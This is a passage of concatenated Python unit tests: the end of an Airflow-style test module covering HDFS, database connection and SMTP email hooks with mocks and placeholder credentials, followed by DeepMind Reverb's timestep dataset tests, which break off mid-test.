elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
timestep_dataset_test.py
|
# Lint as: python3
# Copyright 2019 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for dataset."""
import threading
import time
from absl.testing import parameterized
import numpy as np
from reverb import client
from reverb import errors
from reverb import item_selectors
from reverb import rate_limiters
from reverb import replay_sample
from reverb import server as reverb_server
from reverb import timestep_dataset
import tensorflow.compat.v1 as tf
import tree
from tensorflow.python.framework import tensor_spec # pylint:disable=g-direct-tensorflow-import
def make_server():
return reverb_server.Server(
tables=[
reverb_server.Table(
'dist',
sampler=item_selectors.Prioritized(priority_exponent=1),
remover=item_selectors.Fifo(),
max_size=1000000,
rate_limiter=rate_limiters.MinSize(1)),
reverb_server.Table(
'signatured',
sampler=item_selectors.Prioritized(priority_exponent=1),
remover=item_selectors.Fifo(),
max_size=1000000,
rate_limiter=rate_limiters.MinSize(1),
signature=tf.TensorSpec(dtype=tf.float32, shape=(None, None))),
reverb_server.Table(
'bounded_spec_signatured',
sampler=item_selectors.Prioritized(priority_exponent=1),
remover=item_selectors.Fifo(),
max_size=1000000,
rate_limiter=rate_limiters.MinSize(1),
# Currently only the `shape` and `dtype` of the bounded spec
# is considered during signature check.
# TODO(b/158033101): Check the boundaries as well.
signature=tensor_spec.BoundedTensorSpec(
dtype=tf.float32,
shape=(None, None),
minimum=(0.0, 0.0),
maximum=(10.0, 10.)),
),
],
port=None,
)
class TimestepDatasetTest(tf.test.TestCase, parameterized.TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._server = make_server()
cls._client = client.Client(f'localhost:{cls._server.port}')
def setUp(self):
super().setUp()
self._num_prev_samples = {
table: self._get_total_num_samples(table)
for table in ('dist', 'signatured', 'bounded_spec_signatured')
}
def tearDown(self):
super().tearDown()
self._client.reset('dist')
self._client.reset('signatured')
self._client.reset('bounded_spec_signatured')
@classmethod
def tearDownClass(cls):
super().tearDownClass()
cls._server.stop()
def _populate_replay(self, sequence_length=100, max_time_steps=None):
max_time_steps = max_time_steps or sequence_length
with self._client.writer(max_time_steps) as writer:
for i in range(1000):
writer.append([np.zeros((3, 3), dtype=np.float32)])
if i % 5 == 0 and i >= sequence_length:
writer.create_item(
table='dist', num_timesteps=sequence_length, priority=1)
writer.create_item(
table='signatured', num_timesteps=sequence_length, priority=1)
writer.create_item(
table='bounded_spec_signatured',
num_timesteps=sequence_length,
priority=1)
def _sample_from(self, dataset, num_samples):
iterator = dataset.make_initializable_iterator()
dataset_item = iterator.get_next()
self.evaluate(iterator.initializer)
return [self.evaluate(dataset_item) for _ in range(num_samples)]
def _get_total_num_samples(self, table: str) -> int:
table_info = self._client.server_info()[table]
return table_info.rate_limiter_info.sample_stats.completed
def _get_num_samples(self, table: str) -> int:
"""Gets the number of samples since the start of the test."""
return self._get_total_num_samples(table) - self._num_prev_samples[table]
@parameterized.named_parameters(
{
'testcase_name': 'default_values',
},
{
'testcase_name': 'num_workers_per_iterator_is_0',
'num_workers_per_iterator': 0,
'want_error': ValueError,
},
{
'testcase_name': 'num_workers_per_iterator_is_1',
'num_workers_per_iterator': 1,
},
{
'testcase_name': 'num_workers_per_iterator_is_minus_1',
'num_workers_per_iterator': -1,
},
{
'testcase_name': 'num_workers_per_iterator_is_minus_2',
'num_workers_per_iterator': -2,
'want_error': ValueError,
},
{
'testcase_name': 'max_samples_per_stream_is_0',
'max_samples_per_stream': 0,
'want_error': ValueError,
},
{
'testcase_name': 'max_samples_per_stream_is_1',
'max_samples_per_stream': 1,
},
{
'testcase_name': 'max_samples_per_stream_is_minus_1',
'max_samples_per_stream': -1,
},
{
'testcase_name': 'max_samples_per_stream_is_minus_2',
'num_workers_per_iterator': -2,
'want_error': ValueError,
},
{
'testcase_name': 'max_in_flight_samples_per_worker_is_0',
'max_in_flight_samples_per_worker': 0,
'want_error': ValueError,
},
{
'testcase_name': 'max_in_flight_samples_per_worker_is_1',
'max_in_flight_samples_per_worker': 1,
},
{
'testcase_name': 'max_in_flight_samples_per_worker_is_minus_1',
'max_in_flight_samples_per_worker': -1,
'want_error': ValueError,
},
)
def test_sampler_parameter_validation(self, **kwargs):
dtypes = (tf.float32,)
shapes = (tf.TensorShape([3, 3]),)
if 'max_in_flight_samples_per_worker' not in kwargs:
kwargs['max_in_flight_samples_per_worker'] = 100
if 'want_error' in kwargs:
error = kwargs.pop('want_error')
with self.assertRaises(error):
timestep_dataset.TimestepDataset(self._client.server_address, 'dist',
dtypes, shapes, **kwargs)
else:
timestep_dataset.TimestepDataset(self._client.server_address, 'dist',
dtypes, shapes, **kwargs)
def test_iterate(self):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
tf.constant(self._client.server_address),
table=tf.constant('dist'),
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
got = self._sample_from(dataset, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
# A single sample is returned so the key should be a scalar int64.
self.assertIsInstance(sample.info.key, np.uint64)
np.testing.assert_array_equal(sample.data[0],
np.zeros((3, 3), dtype=np.float32))
def test_distribution_strategy(self):
self._populate_replay()
physical_devices = tf.config.list_physical_devices('CPU')
configs = tf.config.experimental.get_virtual_device_configuration(
physical_devices[0])
if configs is None:
virtual_devices = [
tf.config.experimental.VirtualDeviceConfiguration() for _ in range(4)
]
tf.config.experimental.set_virtual_device_configuration(
physical_devices[0], virtual_devices)
strategy = tf.distribute.MirroredStrategy(['/cpu:%d' % i for i in range(4)])
def timestep_dataset_fn(i):
tf.print('Creating dataset for replica; index:', i)
return timestep_dataset.TimestepDataset(
self._client.server_address,
table=tf.constant('dist'),
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100).take(2)
def dataset_fn(_):
return tf.data.Dataset.range(4).flat_map(timestep_dataset_fn).take(2 * 4)
ds = strategy.experimental_distribute_datasets_from_function(dataset_fn)
def check_probabilities(_, v):
probability = v.info.probability
self.assertLen(probability.values, 4)
# Don't use any math ops since tensor values seem to contain
# unaligned tensors on some systems; but tf.print doesn't check alignment.
#
# This seems to be caused by a compatibility issue where DistStrat isn't
# well tested when eager mode is disabled. So instead of treating this
# as a true TF bug, we just work around it. We can remove this hack and
# convert it to e.g. tf.assert_greater type check if/when we enable eager
# execution for these tests.
tf.print('Probability values:', probability.values)
def get_next_value(v):
return tf.distribute.get_replica_context().merge_call(
check_probabilities, args=(v,))
@tf.function
def run_strategy(ds_):
i = tf.constant(0)
for v in ds_:
strategy.run(get_next_value, args=(v,))
i += 1
return i
rs = run_strategy(ds)
# Each iteration contains 4 items - one from each replica. We take 8 items
# total, so there should be 2 iterations.
self.assertEqual(2, self.evaluate(rs))
def test_timeout_invalid_arguments(self):
with self.assertRaisesRegex(ValueError, r'must be an integer >= -1'):
timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=-2,
max_in_flight_samples_per_worker=100)
def test_timeout(self):
dataset_0s = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=0,
max_in_flight_samples_per_worker=100)
dataset_1s = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=1000,
max_in_flight_samples_per_worker=100)
dataset_2s = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
rate_limiter_timeout_ms=2000,
max_in_flight_samples_per_worker=100)
start_time = time.time()
with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError,
r'End of sequence'):
self._sample_from(dataset_0s, 1)
duration = time.time() - start_time
self.assertGreaterEqual(duration, 0)
self.assertLess(duration, 5)
start_time = time.time()
with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError,
r'End of sequence'):
self._sample_from(dataset_1s, 1)
duration = time.time() - start_time
self.assertGreaterEqual(duration, 1)
self.assertLess(duration, 10)
start_time = time.time()
with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError,
r'End of sequence'):
self._sample_from(dataset_2s, 1)
duration = time.time() - start_time
self.assertGreaterEqual(duration, 2)
self.assertLess(duration, 10)
# If we insert some data, and the rate limiter doesn't force any waiting,
# then we can ask for a timeout of 0s and still get data back.
self._populate_replay()
got = self._sample_from(dataset_0s, 2)
self.assertLen(got, 2)
@parameterized.parameters(['signatured'], ['bounded_spec_signatured'])
def test_inconsistent_signature_size(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.float32, tf.float64),
shapes=(tf.TensorShape([3, 3]), tf.TensorShape([])),
max_in_flight_samples_per_worker=100)
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
r'Inconsistent number of tensors requested from table \'{}\'. '
r'Requested 6 tensors, but table signature shows 5 tensors.'.format(
table_name)):
self._sample_from(dataset, 10)
@parameterized.parameters(['signatured'], ['bounded_spec_signatured'])
def test_incompatible_signature_dtype(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.int64,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
r'Requested incompatible tensor at flattened index 4 from table '
r'\'{}\'. Requested \(dtype, shape\): \(int64, \[3,3\]\). '
r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)):
self._sample_from(dataset, 10)
@parameterized.parameters(['signatured'], ['bounded_spec_signatured'])
def test_incompatible_signature_shape(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3]),),
max_in_flight_samples_per_worker=100)
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
r'Requested incompatible tensor at flattened index 4 from table '
r'\'{}\'. Requested \(dtype, shape\): \(float, \[3\]\). '
r'Signature \(dtype, shape\): \(float, \[\?,\?\]\)'.format(table_name)):
self._sample_from(dataset, 10)
def test_incompatible_dataset_shapes_and_types_without_signature(self):
self._populate_replay()
ds_wrong_shape = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([]),),
max_in_flight_samples_per_worker=100)
with self.assertRaisesRegex(
tf.errors.InvalidArgumentError,
r'Specification has \(dtype, shape\): \(float, \[\]\). '
r'Tensor has \(dtype, shape\): \(float, \[3,3\]\).'):
self._sample_from(ds_wrong_shape, 1)
@parameterized.named_parameters(
dict(testcase_name='TableDist', table_name='dist'),
dict(testcase_name='TableSignatured', table_name='signatured'),
dict(
testcase_name='TableBoundedSpecSignatured',
table_name='bounded_spec_signatured'))
def test_iterate_batched(self, table_name):
self._populate_replay()
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table=table_name,
dtypes=(tf.float32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(2, True)
got = self._sample_from(dataset, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
# The keys should be batched up like the data.
self.assertEqual(sample.info.key.shape, (2,))
np.testing.assert_array_equal(sample.data[0],
np.zeros((2, 3, 3), dtype=np.float32))
def test_iterate_nested_and_batched(self):
with self._client.writer(100) as writer:
for i in range(1000):
writer.append({
'observation': {
'data': np.zeros((3, 3), dtype=np.float32),
'extras': [
np.int64(10),
np.ones([1], dtype=np.int32),
],
},
'reward': np.zeros((10, 10), dtype=np.float32),
})
if i % 5 == 0 and i >= 100:
writer.create_item(table='dist', num_timesteps=100, priority=1)
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(((tf.float32), (tf.int64, tf.int32)), tf.float32),
shapes=((tf.TensorShape([3, 3]), (tf.TensorShape(None),
tf.TensorShape([1]))),
tf.TensorShape([10, 10])),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(3)
structure = {
'observation': {
'data':
tf.TensorSpec([3, 3], tf.float32),
'extras': [
tf.TensorSpec([], tf.int64),
tf.TensorSpec([1], tf.int32),
],
},
'reward': tf.TensorSpec([], tf.int64),
}
got = self._sample_from(dataset, 10)
self.assertLen(got, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
transition = tree.unflatten_as(structure, tree.flatten(sample.data))
np.testing.assert_array_equal(transition['observation']['data'],
np.zeros([3, 3, 3], dtype=np.float32))
np.testing.assert_array_equal(transition['observation']['extras'][0],
np.ones([3], dtype=np.int64) * 10)
np.testing.assert_array_equal(transition['observation']['extras'][1],
np.ones([3, 1], dtype=np.int32))
np.testing.assert_array_equal(transition['reward'],
np.zeros([3, 10, 10], dtype=np.float32))
def test_multiple_iterators(self):
with self._client.writer(100) as writer:
for i in range(10):
writer.append([np.ones((81, 81), dtype=np.float32) * i])
writer.create_item(table='dist', num_timesteps=10, priority=1)
trajectory_length = 5
batch_size = 3
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.float32,),
shapes=(tf.TensorShape([81, 81]),),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(trajectory_length)
iterators = [
dataset.make_initializable_iterator() for _ in range(batch_size)
]
items = tf.stack(
[tf.squeeze(iterator.get_next().data) for iterator in iterators])
with self.session() as session:
session.run([iterator.initializer for iterator in iterators])
got = session.run(items)
self.assertEqual(got.shape, (batch_size, trajectory_length, 81, 81))
want = np.array(
[[np.ones([81, 81]) * i for i in range(trajectory_length)]] *
batch_size)
np.testing.assert_array_equal(got, want)
def test_iterate_over_blobs(self):
for _ in range(10):
self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.int32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
got = self._sample_from(dataset, 20)
self.assertLen(got, 20)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
self.assertIsInstance(sample.info.key, np.uint64)
self.assertIsInstance(sample.info.probability, np.float64)
np.testing.assert_array_equal(sample.data[0],
np.ones((3, 3), dtype=np.int32))
@parameterized.parameters(1, 3, 7)
def test_respects_max_in_flight_samples_per_worker(
self, max_in_flight_samples_per_worker):
for _ in range(10):
self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.int32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=max_in_flight_samples_per_worker)
iterator = dataset.make_initializable_iterator()
dataset_item = iterator.get_next()
self.evaluate(iterator.initializer)
for _ in range(100):
self.evaluate(dataset_item)
# Check that the buffer is incremented by steps of
# max_in_flight_samples_per_worker.
self.assertEqual(
self._get_num_samples('dist') % max_in_flight_samples_per_worker, 0)
def test_iterate_over_batched_blobs(self):
for _ in range(10):
self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.int32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(5)
got = self._sample_from(dataset, 20)
self.assertLen(got, 20)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
self.assertEqual(sample.info.key.shape, (5,))
np.testing.assert_array_equal(sample.data[0],
np.ones((5, 3, 3), dtype=np.int32))
def test_converts_spec_lists_into_tuples(self):
for _ in range(10):
data = [
(np.ones([1, 1], dtype=np.int32),),
[
np.ones([3, 3], dtype=np.int8),
(np.ones([2, 2], dtype=np.float64),)
],
]
self._client.insert(data, {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=[
(tf.int32,),
[
tf.int8,
(tf.float64,),
],
],
shapes=[
(tf.TensorShape([1, 1]),),
[
tf.TensorShape([3, 3]),
(tf.TensorShape([2, 2]),),
],
],
max_in_flight_samples_per_worker=100)
got = self._sample_from(dataset, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
self.assertIsInstance(sample.info.key, np.uint64)
tree.assert_same_structure(sample.data, (
(None,),
(
None,
(None,),
),
))
def test_session_is_closed_while_op_pending(self):
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=tf.float32,
shapes=tf.TensorShape([]),
max_in_flight_samples_per_worker=100)
iterator = dataset.make_initializable_iterator()
item = iterator.get_next()
def _session_closer(sess, wait_time_secs):
def _fn():
time.sleep(wait_time_secs)
sess.close()
return _fn
with self.session() as sess:
sess.run(iterator.initializer)
thread = threading.Thread(target=_session_closer(sess, 3))
thread.start()
with self.assertRaises(tf.errors.CancelledError):
sess.run(item)
class FromTableSignatureTest(tf.test.TestCase):
def test_table_not_found(self):
server = reverb_server.Server([
reverb_server.Table.queue('table_a', 10),
reverb_server.Table.queue('table_c', 10),
reverb_server.Table.queue('table_b', 10),
])
address = f'localhost:{server.port}'
with self.assertRaisesWithPredicateMatch(
ValueError,
